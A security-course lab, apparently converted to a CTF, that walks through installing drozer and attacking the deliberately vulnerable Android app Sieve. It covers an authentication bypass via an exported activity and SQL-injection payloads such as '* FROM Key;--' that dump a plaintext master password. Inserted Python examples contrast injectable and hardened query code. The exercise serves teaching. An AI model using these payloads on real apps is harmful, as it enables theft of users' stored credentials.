M 501: Drozer (20 pts)

What You Need for This Project

Purpose

To practice using drozer, "a comprehensive security audit and attack framework for Android", according to its product page.

Drozer allows you to audit IPC endpoints.


Task 1: Installing Drozer

Installing Drozer on Kali

On Kali, in a Terminal, execute these commands:

wget https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl

pip install drozer-2.4.4-py2-none-any.whl

Drozer is "successfully installed", as shown below.

Downloading the Drozer Agent

The Drozer agent is an Android app that works with the drozer software on Kali to test app security.

On Kali, in a Terminal, execute these commands:

mkdir drozer
cd drozer
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk

The file downloads, as shown below.

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:

adb connect 172.16.123.154
adb devices -l

You should see your Genymotion device in the "List of devices attached", as shown below.

Installing the Agent on Android

On Kali, in a Terminal, execute this command:

adb install drozer-agent-2.3.4.apk

You see a "Success" message, as shown below.

Port Forwarding

Drozer needs to connect to port 31415 on the Android device, and the easiest way to do that is to forward the local port 31415 on Kali to the Android device with adb.

On Kali, in a Terminal, execute this command:

adb forward tcp:31415 tcp:31415

The command completes without errors, as shown below.

Launching the Agent

On your Android device, from the home screen, swipe up from the bottom center to see all apps.

Launch drozer, as shown below.

In the "drozer" screen, at the lower right, click the OFF switch. Now the "Embedded Server" is "ON", as shown below.


Task 2: Exploring Drozer

Opening the drozer Console

On Kali, in a Terminal, execute these commands:

drozer console connect
help

Drozer starts, as shown below.

On Kali, at the dz> prompt, execute these commands:

help shell
! whoami

As you can see, Drozer allows you to run shell commands on your device, with the permissions of the Drozer agent, which is not root, but a numbered user account. On my device, the account was u0_s102, as shown below.

On Kali, at the dz> prompt, execute this command:

list

A long list of drozer modules appears, as shown below. Drozer is a huge pentesting framework, like Metasploit.

On Kali, at the dz> prompt, execute this command:

exit

Task 3: Installing Sieve

Installing Sieve

We'll use an intentionally vulnerable app to practice using drozer.

On Kali, in the Terminal, execute these commands:

cd drozer
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk
adb install sieve.apk

The install fails, saying "NO_MATCHING_ABIS", as shown below.

The problem is that Sieve is an ARM app, but Genymotion is an x86 emulator.

Troubleshooting

If that download link fails, use this alternate command:

wget https://samsclass.info/128/proj/sieve.apk

Installing ARM Translation Libraries

If you are working on an off-campus network, such as a coffeehouse or the "Danger Zone" in S214, on your host system, open a Web browser and go to

https://mega.nz/#F!JhcFwKpC!yfhfeUzvIZoSdBgfdZ9Ygg

Download ARM_Translation_Oreo.zip.

Troubleshooting

If that download link fails, use this alternate download link:

https://samsclass.info/128/proj/ARM_Translation_Oreo.zip

Drag the ARM_Translation_Oreo.zip file onto your Android device and drop it there.

A warning message pops up, as shown below. Click OK.

A message says the file was flashed successfully, as shown below. Click OK.

Turn off your Android device and restart it.

Connecting to your Android Device with ADB

Adb lost its connection to the Genymotion device when it restarted, so you must connect it again.

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:

adb connect 172.16.123.154
adb devices -l

You should see your Genymotion device in the "List of devices attached", as shown below.

Installing Sieve Again

On Kali, in the Terminal, execute this command:

adb install sieve.apk

You see a "Success" message, as shown below.

Putting Passwords into Sieve

On your Android device, from the home screen, swipe up from the bottom center to see all apps.

Launch Sieve, as shown below.

A "Welcome!" screen appears, as shown below.

Enter a password of Password12345678 in both fields and click Submit.

On the "Enter PIN" page, enter a PIN of 4567 in both fields and click Submit, as shown below.

On the next page, enter the password Password12345678 and click "Sign in", as shown below.

In the "Your Passwords" page, at the top right, click the + icon.

Enter some test data, as shown below, and click Save.

Don't put any real passwords into this app, of course, because they will be revealed later in the project.


Task 4: Finding Sieve's Attack Surface with Drozer

Launching the Agent

On your Android device, from the home screen, swipe up from the bottom center to see all apps.

Launch drozer, as shown below.

The "Embedded Server" should be "ON", as shown below.

Retrieving Package Information

On Kali, in a Terminal, execute these commands (the last one is entered at the dz> prompt that appears once the console connects):

adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list -f sieve

Drozer finds the package name of the sieve app, which is

com.mwr.example.sieve

as shown below.

To see basic package information, on Kali, at the dz> prompt, execute this command:

run app.package.info -a com.mwr.example.sieve

This shows where the app stores data, what permissions it has, and more information, as shown below.

Identifying the Attack Surface

To see what vulnerabilities are exposed through Android's built-in Inter-Process Communication (IPC) system, on Kali, at the dz> prompt, execute this command:

run app.package.attacksurface com.mwr.example.sieve

Drozer finds several items "exported", as shown below. These items accept input from other apps, and are possible avenues of exploitation.


Task 5: Auditing Sieve's Activities with Drozer

Listing Activities

To see which activities Sieve exports, on Kali, at the dz> prompt, execute this command:

run app.activity.info -a com.mwr.example.sieve

Drozer finds several exported activities, as shown below. These accept input from other apps, and are possible avenues of exploitation.

The "MainLoginActivity" makes sense--the app needs to take input from the keyboard for that.

But what are "FileSelectActivity" and "PWList"? They are both exported, and can be run without any permissions, as indicated by the "Permission: null" message.
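The "exported with Permission: null" finding above comes from rules in the app's manifest, and the check can be reproduced offline from a manifest alone. This is an added example, not code from the page or from the drozer project: it applies Android's exported-component rules to a constructed AndroidManifest.xml built from the component names the page reports for Sieve (the AddEntryActivity, the targetSdkVersion and the provider authorities are assumptions, not Sieve's real manifest).

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"  # namespace of android: attributes

# Constructed sample manifest using the component names the page reports for Sieve.
# It is NOT the real Sieve manifest; AddEntryActivity and targetSdkVersion are assumed.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.mwr.example.sieve">
  <uses-sdk android:targetSdkVersion="16"/>
  <application>
    <activity android:name=".MainLoginActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".FileSelectActivity" android:exported="true"/>
    <activity android:name=".AddEntryActivity"/>
    <provider android:name=".DBContentProvider" android:authorities="com.mwr.example.sieve.DBContentProvider"/>
    <provider android:name=".FileBackupProvider" android:exported="true"
              android:authorities="com.mwr.example.sieve.FileBackupProvider"/>
  </application>
</manifest>"""


def is_exported(comp, target_sdk):
    """Android's rule: an explicit android:exported wins; otherwise a provider is exported when
    targetSdkVersion < 17, and any other component only if it declares an <intent-filter>."""
    explicit = comp.get(ANDROID + "exported")
    if explicit is not None:
        return explicit == "true"
    if comp.tag == "provider":
        return target_sdk < 17
    return comp.find("intent-filter") is not None


def attack_surface(manifest_xml):
    """Return {tag: [qualified names]} of exported components that require no permission,
    i.e. what drozer lists as exported with "Permission: null"."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    sdk = root.find("uses-sdk")
    target_sdk = int(sdk.get(ANDROID + "targetSdkVersion", "1")) if sdk is not None else 1
    found = {}
    for comp in root.find("application"):
        if comp.tag not in ("activity", "service", "receiver", "provider") or not is_exported(comp, target_sdk):
            continue
        perm = comp.get(ANDROID + "permission")
        if comp.tag == "provider":  # providers may guard reads and writes separately
            perm = perm or comp.get(ANDROID + "readPermission") or comp.get(ANDROID + "writePermission")
        if perm is None:
            name = comp.get(ANDROID + "name")
            found.setdefault(comp.tag, []).append(package + name if name.startswith(".") else name)
    return found
```

Setting android:exported="false" on PWList and FileSelectActivity, or guarding them with a permission, would remove them from this list; the same check run on a manifest you maintain is a quick pre-release audit.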

Look at your Android Device

On your Android device, click the Home button to see the Home screen, as shown below.

Position the Android device so that it remains visible while you execute the Drozer command below.

Launching PWList

To run the "PWList" activity, on Kali, at the dz> prompt, execute this command:

run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

The command runs without errors, as shown below.

On your Android device, the "Your Passwords" page opens, as shown below.

This is an authentication bypass exploit--the Drozer agent did not need your password or PIN to open this screen.

But at this point, we only see usernames, not passwords.


Task 6: Auditing Sieve's Content Providers with Drozer

Reading from Content Providers

The "Attack Surface" said Sieve used two content providers. To get more information about them, on Kali, at the dz> prompt, execute this command:

run app.provider.info -a com.mwr.example.sieve

Drozer finds two exported content providers: DBContentProvider and FileBackupProvider, as shown below. They don't require any permissions to interact with them, except for the /Keys path in the DBContentProvider.

Finding URIs

Content provider URIs always begin with content:// but the rest is not obvious. Drozer can guess them, however.

On Kali, at the dz> prompt, execute this command:

run scanner.provider.finduris -a com.mwr.example.sieve

Drozer tries several guesses, and finds three "Accessible content URIs", highlighted in the image below.

We know the /Keys path requires permissions, but evidently /Passwords does not. To query the /Passwords path, on Kali, at the dz> prompt, execute this command:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/

You see your username and encoded password, highlighted in the image below.

The password was unprintable binary data, so Drozer encoded it with Base64. We don't have the plaintext password yet.


Task 7: Exploiting Database-Backed Content Providers with SQL Injection

Triggering a SQL Error

As usual, adding an apostrophe to a request triggers an error message. There are two fields we can inject into: projection and selection.

On Kali, at the dz> prompt, execute these commands:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

The reply shows "SQLITE_ERROR" messages, including the source code for the query, highlighted in the image below.

Enumerating Table Names

Execute this command to list the table names in the database:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

The reply reveals three table names, including Key, highlighted in the image below.


M 501: Recording Your Success (20 pts)

Find the text covered by a green box in the image above. That's the flag.


Finding Cleartext Passwords

SQL injection allows us to query the contents of the otherwise protected Key table.

Execute this command:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

The reply reveals your plaintext password, as shown below.
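Why the projection field behaves this way, and what the provider should have done instead, is easier to see in a small stand-in. This is an added example, not code from the page or from Sieve: a Python/sqlite3 model of a content provider query() that splices the caller's projection and selection straight into its SQL (the SQLITE_ERROR messages in Task 7 show the statement being built this way), beside a hardened version that allowlists column names and binds the selection value. The table layouts and rows are constructed for the demonstration.

```python
import sqlite3

ALLOWED_COLUMNS = {"Passwords": ("_id", "service", "username", "password")}  # Key is never exposed


def make_db():
    """Constructed in-memory stand-in for Sieve's database; schema and rows are assumed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password BLOB)")
    db.execute("CREATE TABLE Key (_id INTEGER PRIMARY KEY, Password TEXT, pin TEXT)")
    db.execute("INSERT INTO Passwords (service, username, password) VALUES ('gmail', 'sam', X'DEADBEEF')")
    db.execute("INSERT INTO Key (Password, pin) VALUES ('Password12345678', '4567')")
    return db


def vulnerable_query(db, projection, selection=None):
    """Builds the statement by string concatenation, so both fields are injectable.
    A bare apostrophe raises sqlite3.OperationalError (drozer shows this as SQLITE_ERROR),
    and a projection such as "* FROM Key;--" turns the rest of the statement into a comment."""
    sql = "SELECT %s FROM Passwords" % (projection or "*")
    if selection:
        sql += " WHERE " + selection
    return db.execute(sql).fetchall()


def safe_query(db, columns=None, service=None):
    """Hardened form: column names must appear in the allowlist and the selection value is
    passed as a bound parameter. On Android, SQLiteQueryBuilder's projection map and
    strict mode give the same guarantees for a real content provider."""
    allowed = ALLOWED_COLUMNS["Passwords"]
    columns = list(columns) if columns else list(allowed)
    bad = [c for c in columns if c not in allowed]
    if bad:
        raise ValueError("disallowed projection column(s): %r" % bad)
    sql = "SELECT %s FROM Passwords" % ", ".join(columns)
    params = ()
    if service is not None:
        sql += " WHERE service = ?"
        params = (service,)
    return db.execute(sql, params).fetchall()
```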

Sources

Drozer
drozer user guide

Converted to a CTF 2-28-19